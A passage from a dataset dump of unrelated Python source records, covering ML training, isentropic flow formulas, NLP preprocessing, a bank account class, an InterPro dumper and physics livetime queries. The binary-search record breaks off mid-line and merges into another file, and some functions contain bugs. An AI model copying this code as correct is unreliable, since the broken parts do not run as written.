images)] loss: %f\" % (batch+1, (batch+1) * batch_size, loss))\n\n trainer.optimizer = rm.Sgd(lr=learning_rate * (1 - batch / max_batches) ** lr_decay_power, momentum=momentum) # Polynomial decay learning rate\n\n # save model\n if (batch+1) % 1000 == 0:\n model_file = \"%s/%s.h5\" % (backup_path, batch+1)\n print(\"saving model to %s\" % (model_file))\n model.save(model_file)\n model.save(backup_file)\n\nprint(\"saving model to %s/darknet19_448_final.h5\" % (backup_path))\nmodel.save(\"%s/darknet19_448_final.h5\" % (backup_path))\n","sub_path":"darknet19_448_train.py","file_name":"darknet19_448_train.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275549876","text":"# All isentropic flow equations are defined in this module\n\nfrom math import sqrt\nimport pprint\n\n\ndef run_isentropic_funcs(study_blocks):\n ''' Is called by a flow study object. '''\n # sub_blocks = [block for block in study_blocks]\n pp = pprint.PrettyPrinter(indent=4)\n # calculate the defaults first so calculate_values\n # can use the values from blocks that take in default\n default_vals = calculate_defaults(study_blocks)\n results = calculate_results(study_blocks, default_vals)\n pp.pprint(results)\n\n\ndef calculate_defaults(block):\n ''' Calculate defaults first so blocks that take in other blocks don't\n result in errors. '''\n default_dict = {}\n mach = block.fluid_props['mach']\n gamma = block.fluid_props['gamma']\n for key, value in block.parameters.items():\n if value['input'] == 'default':\n out_val = value['output'] # pressure, temp, density?\n out_type = value['out_type'] # ratio or value?\n stag_val = block.fluid_props[out_type]\n result = mach_map[out_val](mach, gamma, out_type, stag_val)\n default_dict[key] = result\n return default_dict\n\n\ndef calculate_results(block, results_dict):\n ''' Calculate the results for the rest of the blocks. '''\n results_dict = {}\n fluid_props = block.parameters\n gamma = fluid_props['gamma']\n for key, value in block.parameters.items():\n if value['input'] != 'default':\n out_val = value['output'] # pressure, temp, density?\n out_type = value['out_type'] # ratio or value?\n input_val = results_dict[key]\n stag_val = fluid_props[out_val]\n result = master_dispatch[out_val](\n stag_val, input_val, out_type, gamma)\n results_dict[key] = result\n return results_dict\n\n\ndef sonic_speed(gamma, gasConst, temp):\n return sqrt(gamma * gasConst * temp)\n\n\ndef pressure_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -(gamma / (gamma - 1))\n elif out_type == 'value':\n return stag_val * (base ** -(gamma / (gamma - 1)))\n\n\ndef temp_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -1\n elif out_type == 'value':\n return stag_val * (base ** -1)\n\n\ndef density_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -(1 / (gamma - 1))\n elif out_type == 'value':\n return stag_val * (base ** -(1 / (gamma - 1)))\n\n\n# The functions below return the downstream value itself rather than a ratio\n\n\ndef press_from_dens(stag_press, inp, input_type, gamma):\n ''' Return pressure given density. 
'''\n if input_type == 'ratio':\n return inp ** gamma\n elif input_type == 'value':\n return stag_press * (inp ** gamma)\n\n\ndef press_from_temp(stag_press, inp, input_type, gamma):\n ''' Return pressure given temperature. '''\n if input_type == 'ratio':\n return inp ** (gamma / (gamma - 1))\n elif input_type == 'value':\n return stag_press * (inp ** (gamma / (gamma - 1)))\n\n\ndef dens_from_press(stag_density, inp, input_type, gamma):\n ''' Return density given pressure. '''\n if input_type == 'ratio':\n return inp ** (1 / gamma)\n elif input_type == 'value':\n return stag_density * (inp ** (1 / gamma))\n\n\ndef dens_from_temp(stag_density, inp, input_type, gamma):\n ''' Return density given pressure. '''\n if input_type == 'ratio':\n return inp ** (1 / (gamma - 1))\n elif input_type == 'value':\n return stag_density * (inp ** (1 / (gamma - 1)))\n\n\ndef temp_from_pressure(stag_temp, inp, input_type, gamma):\n ''' Return temperature given pressure. '''\n if input_type == 'ratio':\n return inp ** ((gamma - 1) / gamma)\n elif input_type == 'value':\n return stag_temp * (inp ** ((gamma - 1) / gamma))\n\n\ndef temp_from_dens(stag_temp, inp, input_type, gamma):\n ''' Return temperature given density. '''\n if input_type == 'ratio':\n return inp ** (gamma - 1)\n elif input_type == 'value':\n return stag_temp * (inp ** (gamma - 1))\n\n\n# Dictionary map of functions that take mach as a parameter\nmach_map = {\n 'pressure': pressure_ratio,\n 'density': density_ratio,\n 'temperature': temp_ratio\n}\n\n# Functions that take pressure as a parameter\npress_map = {\n 'density': press_from_dens,\n 'temperature': press_from_temp\n}\n\n# Functions that take temperature\ntemp_map = {\n 'pressure': temp_from_pressure,\n 'density': temp_from_dens\n}\n\n# Functions that take density\ndens_map = {\n 'pressure': dens_from_press,\n 'temperature': dens_from_temp\n}\n\n# master_dispatch organizes the function dictionaries according to\n# the input specified in the study file, from there the output\n# parameter can be passed into the functions in the dictionaries\n# input: output value\nmaster_dispatch = {\n 'mach': mach_map,\n 'pressure': press_map,\n 'temperature': temp_map,\n 'density': dens_map\n}\n","sub_path":"flow/isentropic.py","file_name":"isentropic.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"299317580","text":"\"\"\"\n Import Module\n\"\"\"\n\nimport os\nfrom joblib import load, dump\nfrom sklearn.ensemble import RandomForestRegressor\nfrom src.Model import Model\nfrom sklearn.model_selection import GridSearchCV\n\n\nclass RandomForest(Model):\n \"\"\"\n RandomForest model class\n \"\"\"\n algorithm = 'RandomForest'\n\n # Default Tuning parameters\n default_parameters = {'n_estimators': [100],\n 'criterion': ['mse', 'mae'],\n 'max_depth': [None],\n 'min_samples_split': [2],\n 'min_samples_leaf': [1],\n 'min_weight_fraction_leaf': [0.],\n 'max_features': [None, 'auto', 'sqrt', 'log2'],\n 'max_leaf_nodes': [None],\n 'min_impurity_decrease': [0.],\n 'bootstrap': [True, False],\n 'oob_score': [True, False],\n 'n_jobs': [None],\n 'random_state': [None],\n 'verbose': [0],\n 'warm_start': [True, False],\n 'class_weight': ['balanced'],\n 'ccp_alpha': [0.0],\n 'max_samples': [None]\n }\n\n # Tuning parameters\n tuning_parameters = {}\n\n def __init__(self, grid_search=False, filename='personality.csv'):\n \"\"\"\n RandomForest class constructor\n\n @param grid_search: indicates whether classifier should be 
created\n with the grid search classifier\n \"\"\"\n super().__init__(self.get_classifier(grid_search), self.algorithm, filename, False)\n\n def get_classifier(self, grid_search):\n \"\"\"\n Function responsible for getting the model\n classifier. If already created it loads it from\n the respective file otherwise creates it.\n \"\"\"\n self.grid_search = grid_search\n\n if grid_search:\n if os.path.isfile('joblib/regression/GridSearchCV_' + self.algorithm + '.joblib'):\n clf = load('joblib/regression/GridSearchCV_' + self.algorithm + '.joblib')\n else:\n clf = GridSearchCV(RandomForestRegressor(), self.tuning_parameters)\n dump(clf, 'joblib/regression/GridSearchCV_' + self.algorithm + '.joblib')\n else:\n if os.path.isfile('joblib/regression/' + self.algorithm + '.joblib'):\n clf = load('joblib/regression/' + self.algorithm + '.joblib')\n else:\n clf = RandomForestRegressor()\n\n return clf\n\n def get_algorithm(self):\n \"\"\"\n Function responsible for retrieving the\n algorithm name\n @return: algorithm name\n \"\"\"\n return self.algorithm\n\n def get_algorithm_gs_param(self):\n \"\"\"\n Function responsible for retrieving the grid\n search parameters\n @return: grid search parameters\n \"\"\"\n return self.tuning_parameters\n\n def get_best_param(self):\n \"\"\"\n Function responsible for showing the best\n parameters for this specific algorithm\n @return:\n \"\"\"\n if self.grid_search:\n value = \"Best parameters for \" + self.algorithm + \" algorithm:\\n\"\n for param_name in self.tuning_parameters:\n value = value + param_name + \": \" + str(self.clf.best_params_[param_name]) + '\\n'\n\n return value\n","sub_path":"Second-Project/src/Regression/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"373397248","text":"# -*- coding: utf-8 -*- \r\n#%reset -f\r\n\"\"\"\r\n@author: Hiromasa Kaneko\r\n\"\"\"\r\n\r\n# Demonstration of GTM\r\n\r\n# settings\r\nshapeofmap = [10, 10]\r\nshapeofrbfcenters = [5, 5]\r\nvarianceofrbfs = 4\r\nlambdainemalgorithm = 0.001\r\nnumberofiterations = 300\r\ndesplayflag = 1\r\n\r\nfrom sklearn.datasets import load_iris\r\nfrom gtm import gtm\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.figure as figure\r\n\r\n# load an iris dataset\r\niris = load_iris()\r\n#inputdataset = pd.DataFrame(iris.data, columns=iris.feature_names)\r\ninputdataset = iris.data\r\ncolor = iris.target\r\n\r\n# autoscaling\r\ninputdataset = (inputdataset - inputdataset.mean(axis=0)) / inputdataset.std(axis=0,ddof=1)\r\n\r\n# construct GTM model\r\nmodel = gtm( shapeofmap, shapeofrbfcenters, varianceofrbfs, lambdainemalgorithm, numberofiterations, desplayflag)\r\nmodel.fit(inputdataset)\r\n\r\nif model.successflag:\r\n # calculate of responsibilities\r\n responsibilities = model.responsibility(inputdataset)\r\n \r\n # plot the mean of responsibilities\r\n means = responsibilities.dot( model.mapgrids )\r\n plt.figure(figsize=figure.figaspect(1))\r\n plt.scatter( means[:,0], means[:,1], c=color)\r\n plt.ylim(-1.1,1.1)\r\n plt.xlim(-1.1,1.1)\r\n plt.xlabel(\"z1 (mean)\")\r\n plt.ylabel(\"z2 (mean)\")\r\n plt.show()\r\n \r\n # plot the mode of responsibilities\r\n modes = model.mapgrids[responsibilities.argmax(axis=1), :]\r\n plt.figure(figsize=figure.figaspect(1))\r\n plt.scatter( modes[:,0], modes[:,1], c=color)\r\n plt.ylim(-1.1,1.1)\r\n plt.xlim(-1.1,1.1)\r\n plt.xlabel(\"z1 (mode)\")\r\n plt.ylabel(\"z2 (mode)\")\r\n 
plt.show()\r\n","sub_path":"Python/demo_gtm.py","file_name":"demo_gtm.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384041832","text":"def dec_bic(n):\n res=0\n exp=0\n while n>0:\n if (n%10)==1 or (n%10)==0:\n res=res+((n%10)*(10**exp))\n exp=exp+1\n n=n//10\n return res\n\ndef contador(n):\n res=0\n db=dec_bic(n)\n while db>0:\n res=res+1\n db=db//10\n return res\n\ndef finalizar(n):\n res=0\n exp=contador(n)-1\n db=dec_bic(n)\n while db>0:\n if db!=0:\n res=res+((db%10)*(10**exp))\n exp=exp-1\n db=db//10\n\n return res\n","sub_path":"PYTHON/desencripta sistema base binario.py","file_name":"desencripta sistema base binario.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"287358513","text":"######################\r\n#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# By Galo\r\n######################\r\nimport os\r\nimport nltk\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.stem import WordNetLemmatizer # lemmatization\r\nfrom nltk.tokenize import sent_tokenize # sentence splitting\r\nfrom nltk.tokenize import word_tokenize # word tokenization\r\nfrom nltk.corpus import stopwords # stopword removal\r\nfrom nltk.stem import SnowballStemmer # stemming\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer #TFIDF\r\nimport chardet # detect encoding format\r\nimport re # regex for stripping punctuation and special characters\r\n\r\n#nltk.download() # download the nltk corpora\r\ncachedStopWords = stopwords.words(\"english\") # use the English stopword list\r\n\r\n\r\ndef read_files(path):\r\n # Read the contents of every file in the corpus folder (binary files here)\r\n # and concatenate the text of all the files into one string, all_text\r\n files= os.listdir(path) # get all file names under the folder\r\n all_text = \"\"\r\n for file in files: # iterate over the folder\r\n if not os.path.isdir(file): # open only if it is not a directory\r\n with open(path+\"/\"+file, \"rb\") as f: # binary files are opened with rb\r\n text = f.read()\r\n encode_type = chardet.detect(text) # detect the encoding\r\n if encode_type['encoding'] != None: # skip files that cannot be decoded\r\n text = text.decode(encode_type['encoding']) # decode accordingly and reassign to the original variable\r\n print(file,'done.') # mark the file as read\r\n all_text = all_text + text\r\n return all_text\r\n\r\n\r\n'''\r\n# This part split sentences first and then tokenized words; in practice it did not seem to help and made the data structures more complex, so it was dropped\r\n\r\nsentences = sent_tokenize(atheism)\r\n# sentence-split the text into sentence level\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\sentences_atheism_sent_tokenize.txt', 'w',encoding='utf-8') as f:\r\n for sentence in sentences:\r\n f.write(str(sentence))\r\nprint('Sentences written.')\r\n\r\nwords = []\r\nfor sentence in sentences:\r\n sentence = re.sub(\"[+:\\.\\!\\/_,$%^*(+\\\"\\'<>]+|[+——!,。?、~@#¥%……&*()]+\", \" \", sentence)\r\n # strip punctuation\r\n words.append(word_tokenize(sentence))\r\n # word-tokenize each sentence; tokenize works at sentence level, so the text should be sentence-split first or results may suffer??? could not see any difference though\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize.txt', 'w',encoding='utf-8') as f:\r\n for word in words:\r\n f.write(str(word))\r\nprint('Words written.')\r\n\r\nwordStoped = []\r\nfor word in words: # remove stopwords\r\n filtered = [w.lower() for w in word if (w.lower() not in cachedStopWords and len(w) > 2)]\r\n # remove stopwords + drop words shorter than 3 characters + lowercase\r\n wordStoped.append(filtered)\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped.txt', 'w',encoding='utf-8') as f:\r\n for wordSt in wordStoped:\r\n f.write(str(wordSt))\r\nprint('WordsStopped written.')\r\n'''\r\n\r\n\r\ndef word_tokenize_stopwords_removal(all_text):\r\n # Tokenize the whole text directly (no sentence splitting) and remove stopwords, punctuation, special characters and symbol-bearing words\r\n # Return the processed result as a list: word_stopped\r\n # atheism = re.sub(\"[+:\\.\\!\\/_,$%^*(+\\\"\\'<>=]+|[+——!,。?、~@#¥%……&*()]+\", \" \", atheism)\r\n # words = word_tokenize(atheism)\r\n # Either strip punctuation and special characters to spaces before tokenizing, or tokenize first and drop tokens containing punctuation; the latter removes more and is the approach taken here\r\n\r\n words = [word for word in word_tokenize(all_text) if (str.isalpha(word) is not False)]\r\n # tokenize, directly dropping every symbol-bearing token, such as e-mail suffixes, hyphenated words and abbreviations\r\n path_word_tokenize = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize.txt'\r\n # path of the file holding the tokenization result above\r\n with open(path_word_tokenize, 'w',encoding='utf-8') as f:\r\n f.write(str(words))\r\n print('Words written.')\r\n\r\n word_stopped = [w.lower() for w in words if (w.lower() not in cachedStopWords and len(w) > 2 and str.isalpha(w) is not False)]\r\n # lowercase, then remove stopwords + words shorter than 3 characters + numbers and symbol-bearing words such as 2-year\r\n path_word_tokenize_stopped = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped.txt'\r\n # path of the file holding the stopword-removal result above\r\n with open(path_word_tokenize_stopped, 'w', encoding='utf-8') as f:\r\n f.write(str(word_stopped))\r\n print('WordsStopped written.')\r\n\r\n return word_stopped\r\n\r\n\r\ndef word_pos_tags(word_stopped):\r\n # POS tagging; return a list of (word, POS tag) tuples: pos_tags\r\n pos_tags = nltk.pos_tag(word_stopped)\r\n path_word_tokenize_stopped_pos_tag = \\\r\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag.txt'\r\n # path of the file holding the POS-tagging result\r\n with open(path_word_tokenize_stopped_pos_tag, 'w', encoding='utf-8') as f:\r\n f.write(str(pos_tags))\r\n print('Pos_tags written.')\r\n return pos_tags\r\n\r\n\r\ndef get_wordnet_pos(treebank_tag):\r\n # map treebank POS tags to WordNet POS constants\r\n if treebank_tag.startswith('J'):\r\n return wordnet.ADJ\r\n elif treebank_tag.startswith('V'):\r\n return wordnet.VERB\r\n elif treebank_tag.startswith('N'):\r\n return wordnet.NOUN\r\n elif treebank_tag.startswith('R'):\r\n return wordnet.ADV\r\n else:\r\n return None\r\n\r\n\r\ndef lemmatize_string(pos_tags):\r\n # Lemmatize and then stem; return the list of processed words: res\r\n res = []\r\n lemmatizer = WordNetLemmatizer() # initialize the lemmatizer\r\n stemmer = SnowballStemmer(\"english\") # choose the language and initialize the stemmer\r\n for word, pos in pos_tags:\r\n wordnet_pos = get_wordnet_pos(pos) or wordnet.NOUN\r\n res.append(stemmer.stem(lemmatizer.lemmatize(word, pos=wordnet_pos)))\r\n return res\r\n\r\n\r\ndef do_lemma_stemmer(pos_tags):\r\n # Run lemmatization and stemming, writing the result to disk\r\n # Return plain text of space-separated words, i.e. a single-string list: word_lemmatized_stemmered_wordonly\r\n word_lemmatized_stemmered = lemmatize_string(pos_tags)\r\n path_word_tokenize_stopped_postag_lemmatized_stemmered_wordonly = \\\r\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_wordonly.txt'\r\n # path of the file holding the lemmatization and stemming result\r\n with open(path_word_tokenize_stopped_postag_lemmatized_stemmered_wordonly, 'w', encoding='utf-8') as f:\r\n for word in word_lemmatized_stemmered:\r\n # sklearn's TFIDF expects plain text of words separated only by spaces\r\n f.write(str(word))\r\n f.write(str(' '))\r\n print(\"WordLemmatized&Stemmered written.\")\r\n\r\n word_lemmatized_stemmered_wordonly = [] # read the text back in the required format\r\n with open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_wordonly.txt', 'r',encoding='utf-8') as f:\r\n word_lemmatized_stemmered_wordonly.append(f.read())\r\n\r\n return word_lemmatized_stemmered_wordonly\r\n\r\n\r\ndef TFIDF(word_lemmatized_stemmered_wordonly):\r\n # Compute TFIDF\r\n tf_idf = TfidfVectorizer() # initialize the vectorizer\r\n tf_data = tf_idf.fit_transform(word_lemmatized_stemmered_wordonly) # compute the TFIDF values\r\n words = tf_idf.get_feature_names() # get the vocabulary terms\r\n TFIDF = dict() # create an empty dict\r\n path_TFIDF = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_TFIDF.txt'\r\n path_TFIDF_sorted = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_TFIDF_sorted.txt'\r\n\r\n with open(path_TFIDF, 'w', encoding='utf-8') as f:\r\n # write the TFIDF values to the file\r\n for i in range(len(word_lemmatized_stemmered_wordonly)):\r\n for j in range(len(words)):\r\n if tf_data[i, j] > 1e-5:\r\n f.write(words[j] + ':' + str(tf_data[i, j]))\r\n f.write('\\n')\r\n TFIDF[str(words[j])] = tf_data[i, j]\r\n print(\"TFIDF written.\")\r\n\r\n TFIDFSorted = sorted(TFIDF.items(), key=lambda e: e[1], reverse=True)\r\n # sort by TFIDF value, descending\r\n\r\n with open(path_TFIDF_sorted, 'w', encoding='utf-8') as f:\r\n # write the sorted TFIDF values to the file\r\n for key in TFIDFSorted:\r\n f.write(str(key))\r\n f.write('\\n')\r\n print(\"TFIDF sorted written.\")\r\n\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n path = \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\20news-19997\\\\20_newsgroups\\\\alt.atheism\"\r\n # directory of the corpus folder to process\r\n atheism = read_files(path)\r\n stopped_words = word_tokenize_stopwords_removal(atheism)\r\n pos_tags_word = word_pos_tags(stopped_words)\r\n TFIDF(do_lemma_stemmer(pos_tags_word))","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"1966756","text":"import datetime\nimport pytz\n\n\nclass Account:\n \"\"\"Simple account class w/ balance\"\"\"\n\n @staticmethod\n def _current_time():\n utc_time = datetime.datetime.utcnow()\n return pytz.utc.localize(utc_time)\n\n def __init__(self, name, balance):\n # name_prompt = input(\"Please enter your name: \")\n # balance_prompt = int(input(\"Please enter your initial deposit: $\"))\n self._name = name\n self.__balance = balance\n self._transaction_list = [(Account._current_time(), balance)]\n print(\"Account created for {} with an initial balance of ${}\".format(self._name, self.__balance))\n\n def deposit(self, amount):\n # amount = int(input(\"Enter you deposit amount: $\"))\n if amount > 0:\n print(\"Depositing ${}...\".format(amount))\n self.__balance += amount\n self._transaction_list.append((Account._current_time(), 
amount))\n        self.show_balance()\n\n    def withdraw(self, amount):\n        # amount = int(input(\"Enter your withdraw amount: $\"))\n        if 0 < amount <= self.__balance:\n            print(\"Withdrawing ${}...\".format(amount))\n            self.__balance -= amount\n            self._transaction_list.append((Account._current_time(), -amount))\n        else:\n            print(\"You cannot withdraw more than your current balance: ${}\".format(self.__balance))\n        self.show_balance()\n        self.show_transactions()\n\n    def show_balance(self):\n        print(\"Balance is ${}\".format(self.__balance))\n\n    def show_transactions(self):\n        for date, amount in self._transaction_list:\n            if amount > 0:\n                tran_type = \"deposited\"\n            else:\n                tran_type = \"withdrawn\"\n                amount *= -1\n            print(\" ${} {} on {} (local time was {})\".format(amount, tran_type, date, date.astimezone()))\n\n# Create some humans with bank accounts:\n\n\nif __name__ == '__main__':\n    # Open new account with initial deposit\n    account1 = Account(input(\"Please enter your name: \"), int(input(\"Please enter your initial deposit: $\")))\n    # Note: outside the class this creates a brand-new attribute; it does not touch the private balance stored as _Account__balance.\n    account1.__balance = 200\n\n    # Make a deposit:\n    account1.deposit(int(input(\"Please enter the amount you would like to deposit: $\")))\n\n    # Make a withdraw that is less than current balance:\n    account1.withdraw(int(input(\"Please enter the amount you would like to withdraw: $\")))\n\n","sub_path":"python_oop/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"132385642","text":"import argparse\nimport os\nimport os.path\n\nimport biothings\nfrom biothings.dataload.dumper import FTPDumper\n\nfrom wdbiothings import config\nfrom wdbiothings.config import DATA_ARCHIVE_ROOT\n\nbiothings.config_for_app(config)\n\n\nclass InterproDumper(FTPDumper):\n    SRC_NAME = \"interpro\"\n    FTP_HOST = 'ftp.ebi.ac.uk'\n    CWD_DIR = 'pub/databases/interpro/current'\n    SRC_ROOT_FOLDER = os.path.join(DATA_ARCHIVE_ROOT, SRC_NAME)\n    FILES = [\"interpro.xml.gz\", \"protein2ipr.dat.gz\"]\n\n    SCHEDULE = \"0 4 * * 0\"\n\n    def get_newest_info(self):\n        release_folder = self.client.pwd()\n        self.release = os.path.split(release_folder)[-1]\n\n    def new_release_available(self):\n        current_release = self.src_doc.get(\"release\")\n        if not current_release or float(self.release) > float(current_release):\n            self.logger.info(\"New release '%s' found\" % self.release)\n            return True\n        else:\n            self.logger.debug(\"No new release found\")\n            return False\n\n    def create_todump_list(self, force=False):\n        self.get_newest_info()\n        self.to_dump = []\n        for file in self.FILES:\n            new_localfile = os.path.join(self.new_data_folder, file)\n            current_localfile = os.path.join(self.current_data_folder, file) if self.current_data_folder else new_localfile\n            if force or not os.path.exists(current_localfile) or self.new_release_available():\n                self.to_dump.append({\"remote\": file, \"local\": new_localfile})\n            else:\n                print(\"Skipping: {}\".format(current_localfile))\n        print(self.to_dump)\n\n\ndef main(force=False):\n    dumper = InterproDumper()\n    # pass the caller's force flag through instead of hard-coding False\n    dumper.dump(force=force)\n    dumper.create_todump_list()\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='run interpro dumper')\n    parser.add_argument('--force', action='store_true', help='force new download')\n    args = parser.parse_args()\n    
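# Hypothetical command-line usage (an assumption for illustration, not part of the original source): python dumper.py --force\n    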
main(force=args.force)\n","sub_path":"wdbiothings/contrib/interpro/dumper.py","file_name":"dumper.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"610207050","text":"# You are given a sorted array consisting of only integers where every element appears exactly twice,\n# except for one element which appears exactly once. Find this single element that appears only once.\n\n# Note: Your solution should run in O(log n) time and O(1) space.\n\n# Input: [1,1,2,3,3,4,4,8,8]\n# Output: 2\n\n# Input: [3,3,7,7,10,11,11]\n# Output: 10\n\ndef singleNonDuplicate(nums):\n low = 0\n high = len(nums)-1\n while low= b >= c or a >= c >= b:\n\tmaior = a\n\tif c >= b:\n\t\tmenor = b\n\telse:\n\t\tmenor = c\n\nelif b >= c >= a or b >= a >= c:\n\tmaior = b\n\tif a >= c:\n\t\tmenor = c\n\telse:\n\t\tmenor = a\n\nelif c >= a >= b or c >= b >= a:\n\tmaior = c\n\tif b >= a:\n\t\tmenor = a\n\telse:\n\t\tmenor = b\nelse :\n\tmaior = 'iguais'\n\tmenor = 'iguais' \n\t\n\n\nprint ('Maior numero é: ', maior)\nprint ('Menor numero é: ', menor)\n","sub_path":"Lista_II/questao05.py","file_name":"questao05.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153088389","text":"\"\"\"Compute total dataset muon and multiplicity efficiencies and livetime.\"\"\"\nimport numpy as np\n\nfrom dyb_analysis import common\n\ndef daq_livetime_s(database, label):\n \"\"\"Return an array of DAQ livetimes ordered from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n # Total DAQ Livetime\n cursor.execute('''\n SELECT\n SUM(Livetime_ns/Efficiency/1e9)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n livetimes_s = np.array(cursor.fetchall()).reshape(-1)\n return livetimes_s\n\ndef daq_livetime_days(database, label):\n \"\"\"Return an array of DAQ livetimes in days from EH1-AD1 to EH3-AD4.\"\"\"\n livetime_s = daq_livetime_s(database, label)\n return livetime_s/60/60/24\n\ndef unvetoed_livetime_s(database, label):\n \"\"\"Return an array of unvetoed livetimes ordered from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n # Total DAQ Livetime\n cursor.execute('''\n SELECT\n SUM(Livetime_ns/1e9)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n livetimes_s = np.array(cursor.fetchall()).reshape(-1)\n return livetimes_s\n\ndef muon_efficiency(database, label):\n \"\"\"Return an array of muon efficiencies from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(Livetime_ns)/SUM(Livetime_ns/Efficiency)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n muon_effs = np.array(cursor.fetchall()).reshape(-1)\n return muon_effs\n\ndef muon_total_counts(database, label):\n \"\"\"Return an array of muon counts from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(`Count`)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n muon_counts = 
np.array(cursor.fetchall()).reshape(-1)\n return muon_counts\n\ndef muon_rate_Hz(database, label):\n \"\"\"Return an array of muon rates from EH1-AD1 to EH3-AD4.\"\"\"\n unvetoed_livetimes = unvetoed_livetime_s(database, label)\n counts = muon_total_counts(database, label)\n return counts / unvetoed_livetimes\n\ndef multiplicity_efficiency(database, label):\n \"\"\"Return an array of multiplicity efficiencies from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(MultiplicityVetoEfficiency * Livetime_ns/Efficiency)/\n SUM(Livetime_ns/Efficiency)\n FROM\n singles_rates\n NATURAL JOIN\n runs\n INNER JOIN\n muon_rates\n USING (\n RunNo,\n DetNo,\n Label\n )\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n mult_effs = np.array(cursor.fetchall()).reshape(-1)\n return mult_effs\n\ndef singles_rate_Hz(database, label):\n \"\"\"Return an array of singles rates from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(singles.Rate_Hz * Livetime_ns/Efficiency)/\n SUM(Livetime_ns/Efficiency)\n FROM\n singles_rates AS singles\n NATURAL JOIN\n runs\n INNER JOIN\n muon_rates\n USING (\n RunNo,\n DetNo,\n Label\n )\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n singles_rates = np.array(cursor.fetchall()).reshape(-1)\n return singles_rates\n\ndef coincidences_counts(database, label):\n \"\"\"Return an array of coincidence counts from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(NumCoincidences)\n FROM\n 